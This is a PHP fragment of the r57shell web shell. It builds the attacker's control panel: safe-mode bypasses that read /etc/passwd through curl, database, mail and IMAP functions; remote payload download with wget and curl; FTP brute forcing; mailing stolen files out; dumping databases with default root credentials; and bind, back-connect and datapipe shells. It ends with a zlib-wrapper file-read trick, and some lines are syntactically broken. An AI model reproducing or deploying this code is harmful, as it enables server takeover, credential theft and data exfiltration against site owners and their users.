if($safe_mode){ echo $fs.$table_up1.div_title($lang[$language.'_text57'],'id4').$table_up2.div('id4').$ts; echo sr(15,"".$lang[$language.'_text58'].$arrow."",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));

} if($safe_mode && $unix){ echo $fs.$table_up1.div_title($lang[$language.'_text67'],'id5').$table_up2.div('id5').$ts; echo sr(15,"".$lang[$language.'_text68'].$arrow."","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."".$lang[$language.'_text69'].$arrow."".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."".$lang[$language.'_text70'].$arrow."".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));

} if(!$safe_mode){ $aliases2 = ; foreach ($aliases as $alias_name=>$alias_cmd)

{
$aliases2 .= "<option>$alias_name</option>";
}

echo $fs.$table_up1.div_title($lang[$language.'_text7'],'id6').$table_up2.div('id6').$ts; echo sr(15,"".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));

} echo $fs.$table_up1.div_title($lang[$language.'_text54'],'id7').$table_up2.div('id7').$ts; echo sr(15,"".$lang[$language.'_text52'].$arrow."",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); echo sr(15,"".$lang[$language.'_text53'].$arrow."",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )"); echo sr(15,"".$lang[$language.'_text55'].$arrow."",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));

if(!$safe_mode && $unix){ echo $fs.$table_up1.div_title($lang[$language.'_text76'],'id8').$table_up2.div('id8').$ts; echo sr(15,"".$lang[$language.'_text72'].$arrow."",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); echo sr(15,"".$lang[$language.'_text73'].$arrow."",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )"); echo sr(15,"".$lang[$language.'_text74'].$arrow."",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));

} echo $fs.$table_up1.div_title($lang[$language.'_text32'],'id9').$table_up2.$font;

echo $table_end1.$fe; if($safe_mode&&$curl_on) { echo $fs.$table_up1.div_title($lang[$language.'_text33'],'id10').$table_up2.div('id10').$ts; echo sr(15,"".$lang[$language.'_text30'].$arrow."",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));

} if($safe_mode) { echo $fs.$table_up1.div_title($lang[$language.'_text34'],'id11').$table_up2.div('id11').$ts;

} if($safe_mode&&$mysql_on) { echo $fs.$table_up1.div_title($lang[$language.'_text35'],'id12').$table_up2.div('id12').$ts; echo sr(15,"".$lang[$language.'_text36'].$arrow."",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."".$lang[$language.'_text37'].$arrow."".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."".$lang[$language.'_text38'].$arrow."".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."".$lang[$language.'_text14'].$arrow."".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306")))); echo sr(15,"".$lang[$language.'_text30'].$arrow."",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));

} if($safe_mode&&$mssql_on) { echo $fs.$table_up1.div_title($lang[$language.'_text85'],'id13').$table_up2.div('id13').$ts; echo sr(15,"".$lang[$language.'_text36'].$arrow."",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."".$lang[$language.'_text37'].$arrow."".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."".$lang[$language.'_text38'].$arrow."".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."".$lang[$language.'_text14'].$arrow."".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433")))); echo sr(15,"".$lang[$language.'_text3'].$arrow."",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));

} if($safe_mode&&$unix&&function_exists('mb_send_mail')){ echo $fs.$table_up1.div_title($lang[$language.'_text112'],'id22').$table_up2.div('id22').$ts; echo sr(15,"".$lang[$language.'_text30'].$arrow."",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));

} if($safe_mode&&function_exists('imap_list')){ echo $fs.$table_up1.div_title($lang[$language.'_text113'],'id23').$table_up2.div('id23').$ts; echo sr(15,"".$lang[$language.'_text4'].$arrow."",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));

} if($safe_mode&&function_exists('imap_body')){ echo $fs.$table_up1.div_title($lang[$language.'_text114'],'id24').$table_up2.div('id24').$ts; echo sr(15,"".$lang[$language.'_text30'].$arrow."",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));

} if($safe_mode) { echo $fs.$table_up1.div_title($lang[$language.'_text115'],'id25').$table_up2.div('id25').$ts; echo sr(15,"".$lang[$language.'_text116'].$arrow."",in('text','test8_file1',96,(!empty($_POST['test8_file1'])?($_POST['test8_file1']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test8')); echo sr(15,"".$lang[$language.'_text117'].$arrow."",in('text','test8_file2',96,(!empty($_POST['test8_file2'])?($_POST['test8_file2']):($dir))).ws(4).in('submit','submit',0,$lang[$language.'_butt8']));

} if(@ini_get('file_uploads')){ echo "<form name=upload method=POST ENCTYPE=multipart/form-data>"; echo $table_up1.div_title($lang[$language.'_text5'],'id14').$table_up2.div('id14').$ts; echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile',85,)); echo sr(15,"".$lang[$language.'_text21'].$arrow."",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,).in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));

} if(!$safe_mode&&$unix){ echo $fs.$table_up1.div_title($lang[$language.'_text15'],'id15').$table_up2.div('id15').$ts; echo sr(15,"".$lang[$language.'_text16'].$arrow."","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."".$lang[$language.'_text17'].$arrow."".in('text','rem_file',78,'http://')); echo sr(15,"".$lang[$language.'_text18'].$arrow."",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));

} echo $fs.$table_up1.div_title($lang[$language.'_text86'],'id16').$table_up2.div('id16').$ts; echo sr(15,"".$lang[$language.'_text59'].$arrow."",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14'])); $arh = $lang[$language.'_text92']; if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip'; } if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' gzip'; } if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; } echo sr(15,"".$lang[$language.'_text91'].$arrow."",in('radio','compress',0,'none',1).' '.$arh);

if(@function_exists("ftp_connect")){

";

} if($unix && @function_exists("ftp_connect")){ echo $fs.$table_up1.div_title($lang[$language.'_text94'],'id18').$table_up2.div('id18').$ts; echo sr(15,"".$lang[$language.'_text88'].$arrow."",in('text','ftp_server_port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); echo sr(15,"","".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )"); echo sr(15,"",in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']);

echo $te.''.$table_end1.$fe;

} if(@function_exists("mail")){

echo $table_up1.div_title($lang[$language.'_text102'],'id19').$table_up2.div('id19').$ts."".$fs."".$ts; echo "

";

echo sr(25,"".$lang[$language.'_text105'].$arrow."",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir)); echo sr(25,"".$lang[$language.'_text106'].$arrow."",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com")))); echo sr(25,"".$lang[$language.'_text107'].$arrow."",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("hello billy")))); echo sr(25,"".$lang[$language.'_text108'].$arrow."",'<textarea name=text cols=33 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>'); echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));

echo $te."".$fe.$fs."".$ts; echo "

";

echo sr(25,"".$lang[$language.'_text105'].$arrow."",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir)); echo sr(25,"".$lang[$language.'_text106'].$arrow."",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com")))); echo sr(25,"".$lang[$language.'_text107'].$arrow."",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("file from r57shell")))); echo sr(25,"".$lang[$language.'_text18'].$arrow."",in('text','loc_file',45,$dir)); echo sr(25,"".$lang[$language.'_text91'].$arrow."",in('radio','compress',0,'none',1).' '.$arh); echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));

echo $te."".$fe."";

} if($mysql_on||$mssql_on||$pg_on||$ora_on) { $select = '<select name=db>'; if($mysql_on) $select .= '<option>MySQL</option>'; if($mssql_on) $select .= '<option>MSSQL</option>'; if($pg_on) $select .= '<option>PostgreSQL</option>'; if($ora_on) $select .= '<option>Oracle</option>'; $select .= '</select>';

echo $table_up1.div_title($lang[$language.'_text82'],'id20').$table_up2.div('id20').$ts."".$fs."".$ts; echo "

";

echo sr(35,"".$lang[$language.'_text80'].$arrow."",$select); echo sr(35,"".$lang[$language.'_text111'].$arrow."",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' : '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); echo sr(35,"".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' : '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); echo sr(35,"".$lang[$language.'_text36'].$arrow."",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' . '.in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user")))); echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."".$lang[$language.'_text41'].$arrow."",in('checkbox','dif id=dif',0,'1').in('text','dif_name',31,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql")))); echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9']));

echo $te."".$fe.$fs."".$ts; echo "

";

echo sr(35,"".$lang[$language.'_text80'].$arrow."",$select); echo sr(35,"".$lang[$language.'_text111'].$arrow."",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' : '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); echo sr(35,"".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' : '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); echo sr(35,"".$lang[$language.'_text39'].$arrow."",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql")))); echo sr(35,"".$lang[$language.'_text84'].$arrow."".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");

echo $te."

".$fe."";

} if(!$safe_mode&&$unix){

echo $table_up1.div_title($lang[$language.'_text81'],'id21').$table_up2.div('id21').$ts."".$fs."".$ts; echo "

";

echo sr(40,"".$lang[$language.'_text10'].$arrow."",in('text','port',15,'11457')); echo sr(40,"".$lang[$language.'_text11'].$arrow."",in('text','bind_pass',15,'r57')); echo sr(40,"".$lang[$language.'_text20'].$arrow."","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir)); echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));

echo $te."".$fe.$fs."".$ts; echo "

";

echo sr(40,"".$lang[$language.'_text13'].$arrow."",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")))); echo sr(40,"".$lang[$language.'_text14'].$arrow."",in('text','port',15,'11457')); echo sr(40,"".$lang[$language.'_text20'].$arrow."","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir)); echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));

echo $te."".$fe.$fs."".$ts; echo "

";

echo sr(40,"".$lang[$language.'_text23'].$arrow."",in('text','local_port',15,'11457')); echo sr(40,"".$lang[$language.'_text24'].$arrow."",in('text','remote_host',15,'irc.dalnet.ru')); echo sr(40,"".$lang[$language.'_text25'].$arrow."",in('text','remote_port',15,'6667')); echo sr(40,"".$lang[$language.'_text26'].$arrow."","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir)); echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));

echo $te."".$fe."";

}

echo ''.$table_up3."

".$f;

$u1p=""; // File to Include... or use _GET _POST $tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp

echo "

\n";
if(empty($snn)){
if(empty($_GET['snn'])){
if(empty($_POST['snn'])){
die("\nSnIpEr_SA");
} else {
$u1p=$_POST['snn'];
}
} else {
$u1p=$_GET['snn'];
}
}

$temp=tempnam($tymczas, "cx");

if(copy("compress.zlib://".$snn, $temp)){
$zrodlo = fopen($temp, "r");
$tekst = fread($zrodlo, filesize($temp));
fclose($zrodlo);
echo "".htmlspecialchars($tekst)."";
unlink($temp);

} else {
die("
".htmlspecialchars($u1p)." عفوا! الملف غير موجود او ليس لديك الصلاحيه للدخول.");
}

?>